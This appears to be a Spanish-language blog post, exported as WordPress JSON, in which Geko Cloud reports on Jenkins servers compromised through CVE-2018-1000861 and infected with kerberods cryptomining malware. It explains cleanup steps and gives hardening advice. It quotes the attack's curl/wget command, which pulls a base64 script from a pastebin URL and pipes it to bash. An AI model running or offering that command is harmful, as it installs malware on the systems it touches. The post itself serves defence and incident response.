{"id":2390,"date":"2019-05-19T21:20:30","date_gmt":"2019-05-19T21:20:30","guid":{"rendered":"https:\/\/geko2.factoryfy.com\/?p=600"},"modified":"2021-11-03T17:12:30","modified_gmt":"2021-11-03T16:12:30","slug":"jenkins-malware-criptomonedas","status":"publish","type":"post","link":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","title":{"rendered":"Jenkins Exploit Cryptocurrency mining malware"},"content":{"rendered":"<p>Hace unos d\u00edas atr\u00e1s, nuestro sistema de alertas nos notific\u00f3 que varios de los servidores de algunos clientes ten\u00edan un crecimiento de carga en el sistema totalmente abrupto, incluso en alg\u00fan caso se dio un downtime directamente.<\/p>\n<p>Tras entrar en los sistemas, al cabo de un breve an\u00e1lisis inicial del equipo Geko, detectamos que los sistemas hab\u00edan quedado comprometidos por un ataque a los mismos derivado de una vulnerabilidad de su plataforma Jenkins a trav\u00e9s del exploit reconocido CVE-2018-1000861. Para resumir, b\u00e1sicamente permite inyectar y ejecutar c\u00f3digo en el servidor.<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-601 aligncenter\" src=\"https:\/\/geko2.factoryfy.com\/wp-content\/uploads\/jenkins-vulnerability-attack-300x260.png\" alt=\"\" width=\"415\" height=\"359\" \/><\/p>\n<p>Este esquema detalla los pasos que hace el script pero resumiento y tras nuestro an\u00e1lisis detectamos b\u00e1sicamente:<\/p>\n<ul>\n<li>Se ejecuta un curl y un wget que descarga directamente el script en base 64 y lo ejecuta (curl -fsSL https:\/\/pastebin.com\/raw\/B3Ppi9ub||wget -q -O &#8211; https:\/\/pastebin.com\/raw\/B3Ppi9ub)| base64 -d | bash<\/li>\n<li>Dependiendo del sistema operativo tiene un comportamiento u otro<\/li>\n<li>Instala un servicio llamado netdns en el que hace una llamada a un binario que es el c\u00f3digo malware llamado kerberods el cual limita el uso de las CPU&#8217;s dedicando todas -1 al minado de cryptomonedas<\/li>\n<li>Elimina el fichero \/etc\/hosts<\/li>\n<li>Instala varios ficheros de cron <em>oanacroane<\/em>\u00a0y en varios como el cron de apache que constantemente descargan el c\u00f3digo y lo ejecuta por si se pretende detener la amenaza<\/li>\n<li>El proceso se configura para lanzarse en runlevel 3<\/li>\n<li>El proceso binario en ejecuci\u00f3n se camufla haciendo indetectable<\/li>\n<li>En sistemas debian detectamos tambi\u00e9n el proceso <em>watchbdog<\/em><\/li>\n<li>El script inicial adem\u00e1s de ejecutar el binario y crear el proceso tambi\u00e9n accede al fichero known_hosts y trata de saltar mediante claves cruzadas ssh a otros sistemas . Al ser un sistema Jenkins es m\u00e1s que probable que este ataque tenga efecto<\/li>\n<\/ul>\n<p>Tras varias horas de investigaci\u00f3n detectamos que era preciso ejecutar una busybox en el Linux para poder eliminar el proceso enmascarado. Geko utiliz\u00f3 esta:\u00a0https:\/\/busybox.net\/downloads\/binaries\/1.30.0-i686\/busybox<\/p>\n<p>Y gracias a algunos procesos del repo\u00a0https:\/\/git.laucyun.com\/laucyun y a unos scripts propios conseguimos eliminar la amenaza hasta poder asegurar de nuevo los sistemas y reinstalar los comprometidos.<\/p>\n<p>Hay que tener en cuenta de que los scripts de ataques tienen un nivel de profundidad y de complejidad elevada y a pesar de hacer ingenier\u00eda inversa, al tratarse de un repositorio constantemente en mejora por el conjunto de atacantes chinos \u00abRocke Group\u00bb hace pr\u00e1cticamente imposible garantizar 100% que el sistema queda totalmente protegido.<\/p>\n<p>Lo m\u00e1s sorprendente de todo es que a priori se trata de un malware que infecta de forma autom\u00e1tica y en el README del repo de c\u00f3digo del malware el grupo de atacantes hackers indican que sus intenciones no son romper nada, simplemente identificar vulnerabilidades de seguridad y sacar algo de \u00abtajada\u00bb minando cryptomonedas sin ir m\u00e1s all\u00e1&#8230; incluso detallan la posibilidad de ayudar en caso de que los infectados requieran soporte&#8230; cosa que evidentemente no hicimos.<\/p>\n<h3>Gu\u00eda de buenas pr\u00e1cticas :<\/h3>\n<ul>\n<li>Evitar tener los binarios curl y\/o wget en nuestros sitemas<\/li>\n<li>Evitar ejecutar jenkins con usuario root<\/li>\n<li>Evitar publicar el servicio jenkins, ssh o cualquier servicio o puerto vulnerable<\/li>\n<li>Tener todos los servicios, SO etc en la \u00faltima versi\u00f3n de seguridad que el fabricante indique<\/li>\n<li>Evitar cruzar claves ssh<\/li>\n<li>Mantener saneamiento de ficheros known_hosts<\/li>\n<li>Monitorizar los sistemas productivos 24X7 con alertas pre y proactivas<\/li>\n<li>Verificar siempre el contenido de backup de nuestros sistemas<\/li>\n<li>Versionar los scripts y ficheros (crons, hosts, etc) para poder recuperar los sistemas en caso de ataque<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Os dejamos el enlace a nuestro repositorio p\u00fablico d\u00f3nde ten\u00e9is una primera versi\u00f3n del script de limpieza que utilizamos resumido:<\/p>\n<p><a href=\"https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool\">https:\/\/github.com\/GekoCloud\/cryptocurrency-mining-malware-clean-tool<\/a><\/p>\n<p>Desde Geko estaremos encantados de poder ayudaros en caso de identificar esta vulnerabilidad en vuestro sistema, contactad a trav\u00e9s de info@geko.cloud, <a href=\"https:\/\/geko.cloud\/es\/contacto\/\">cont\u00e1ctanos<\/a>!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hace unos d\u00edas atr\u00e1s, nuestro sistema de alertas nos notific\u00f3 que varios de los servidores de algunos clientes ten\u00edan un crecimiento de carga en el sistema totalmente abrupto, incluso en alg\u00fan caso se dio un downtime directamente. Tras entrar en los sistemas, al cabo de un breve an\u00e1lisis inicial del equipo Geko, detectamos que los [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2391,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[18],"tags":[54],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Jenkins Exploit Cryptocurrency mining malware<\/title>\n<meta name=\"description\" content=\"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Jenkins Exploit Cryptocurrency mining malware\" \/>\n<meta property=\"og:description\" content=\"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes\" \/>\n<meta property=\"og:url\" content=\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\" \/>\n<meta property=\"og:site_name\" content=\"Geko Cloud\" \/>\n<meta property=\"article:published_time\" content=\"2019-05-19T21:20:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-03T16:12:30+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\" \/>\n\t<meta property=\"og:image:width\" content=\"920\" \/>\n\t<meta property=\"og:image:height\" content=\"797\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Jose Luis S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@geko_cloud\" \/>\n<meta name=\"twitter:site\" content=\"@geko_cloud\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"author\":{\"name\":\"Jose Luis S\u00e1nchez\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\"},\"headline\":\"Jenkins Exploit Cryptocurrency mining malware\",\"datePublished\":\"2019-05-19T21:20:30+00:00\",\"dateModified\":\"2021-11-03T16:12:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"},\"wordCount\":673,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"keywords\":[\"Jenkins\"],\"articleSection\":[\"Labs\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"url\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\",\"name\":\"Jenkins Exploit Cryptocurrency mining malware\",\"isPartOf\":{\"@id\":\"https:\/\/geko.cloud\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"datePublished\":\"2019-05-19T21:20:30+00:00\",\"dateModified\":\"2021-11-03T16:12:30+00:00\",\"description\":\"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes\",\"breadcrumb\":{\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png\",\"width\":920,\"height\":797,\"caption\":\"jenkins attack\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/geko.cloud\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Jenkins Exploit Cryptocurrency mining malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/geko.cloud\/es\/#website\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"name\":\"Geko Cloud\",\"description\":\"Servicios de consultor\u00eda cloud y devops\",\"publisher\":{\"@id\":\"https:\/\/geko.cloud\/es\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/geko.cloud\/es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/geko.cloud\/es\/#organization\",\"name\":\"Geko Cloud\",\"url\":\"https:\/\/geko.cloud\/es\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"contentUrl\":\"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png\",\"width\":1650,\"height\":809,\"caption\":\"Geko Cloud\"},\"image\":{\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/geko_cloud\",\"https:\/\/www.instagram.com\/gekocloud\/\",\"https:\/\/www.linkedin.com\/company\/gekocloud\",\"https:\/\/www.youtube.com\/channel\/UC5EFLCqUM7fEaXSa_0nWowQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed\",\"name\":\"Jose Luis S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/geko.cloud\/es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g\",\"caption\":\"Jose Luis S\u00e1nchez\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Jenkins Exploit Cryptocurrency mining malware","description":"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","og_locale":"es_ES","og_type":"article","og_title":"Jenkins Exploit Cryptocurrency mining malware","og_description":"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes","og_url":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","og_site_name":"Geko Cloud","article_published_time":"2019-05-19T21:20:30+00:00","article_modified_time":"2021-11-03T16:12:30+00:00","og_image":[{"width":920,"height":797,"url":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","type":"image\/png"}],"author":"Jose Luis S\u00e1nchez","twitter_card":"summary_large_image","twitter_creator":"@geko_cloud","twitter_site":"@geko_cloud","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#article","isPartOf":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"},"author":{"name":"Jose Luis S\u00e1nchez","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed"},"headline":"Jenkins Exploit Cryptocurrency mining malware","datePublished":"2019-05-19T21:20:30+00:00","dateModified":"2021-11-03T16:12:30+00:00","mainEntityOfPage":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"},"wordCount":673,"commentCount":0,"publisher":{"@id":"https:\/\/geko.cloud\/es\/#organization"},"image":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"thumbnailUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","keywords":["Jenkins"],"articleSection":["Labs"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","url":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/","name":"Jenkins Exploit Cryptocurrency mining malware","isPartOf":{"@id":"https:\/\/geko.cloud\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"image":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage"},"thumbnailUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","datePublished":"2019-05-19T21:20:30+00:00","dateModified":"2021-11-03T16:12:30+00:00","description":"En este caso describimos la experiencia y las acciones que el equipo t\u00e9cnico de Geko Cloud tom\u00f3 para enfrentarnos a un ataque fruto de la vulnerabilidad de jenkins CVE-2018-1000861 que infect\u00f3 con el malware kerberods que minaba cryptomonedas e infectaba los servidores de nuestros clientes","breadcrumb":{"@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#primaryimage","url":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","contentUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/jenkins-vulnerability-attack.png","width":920,"height":797,"caption":"jenkins attack"},{"@type":"BreadcrumbList","@id":"https:\/\/geko.cloud\/es\/jenkins-malware-criptomonedas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/geko.cloud\/es\/"},{"@type":"ListItem","position":2,"name":"Jenkins Exploit Cryptocurrency mining malware"}]},{"@type":"WebSite","@id":"https:\/\/geko.cloud\/es\/#website","url":"https:\/\/geko.cloud\/es\/","name":"Geko Cloud","description":"Servicios de consultor\u00eda cloud y devops","publisher":{"@id":"https:\/\/geko.cloud\/es\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/geko.cloud\/es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/geko.cloud\/es\/#organization","name":"Geko Cloud","url":"https:\/\/geko.cloud\/es\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/","url":"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png","contentUrl":"https:\/\/geko.cloud\/wp-content\/uploads\/2021\/10\/geko_logo-positivo.png","width":1650,"height":809,"caption":"Geko Cloud"},"image":{"@id":"https:\/\/geko.cloud\/es\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/geko_cloud","https:\/\/www.instagram.com\/gekocloud\/","https:\/\/www.linkedin.com\/company\/gekocloud","https:\/\/www.youtube.com\/channel\/UC5EFLCqUM7fEaXSa_0nWowQ"]},{"@type":"Person","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/d06aff498ebfbc75b5010ebe92af41ed","name":"Jose Luis S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/geko.cloud\/es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ebfd055d4dba456220c682523fcc237c?s=96&d=mm&r=g","caption":"Jose Luis S\u00e1nchez"}}]}},"_links":{"self":[{"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/posts\/2390"}],"collection":[{"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/comments?post=2390"}],"version-history":[{"count":2,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/posts\/2390\/revisions"}],"predecessor-version":[{"id":5179,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/posts\/2390\/revisions\/5179"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/media\/2391"}],"wp:attachment":[{"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/media?parent=2390"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/categories?post=2390"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/geko.cloud\/es\/wp-json\/wp\/v2\/tags?post=2390"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}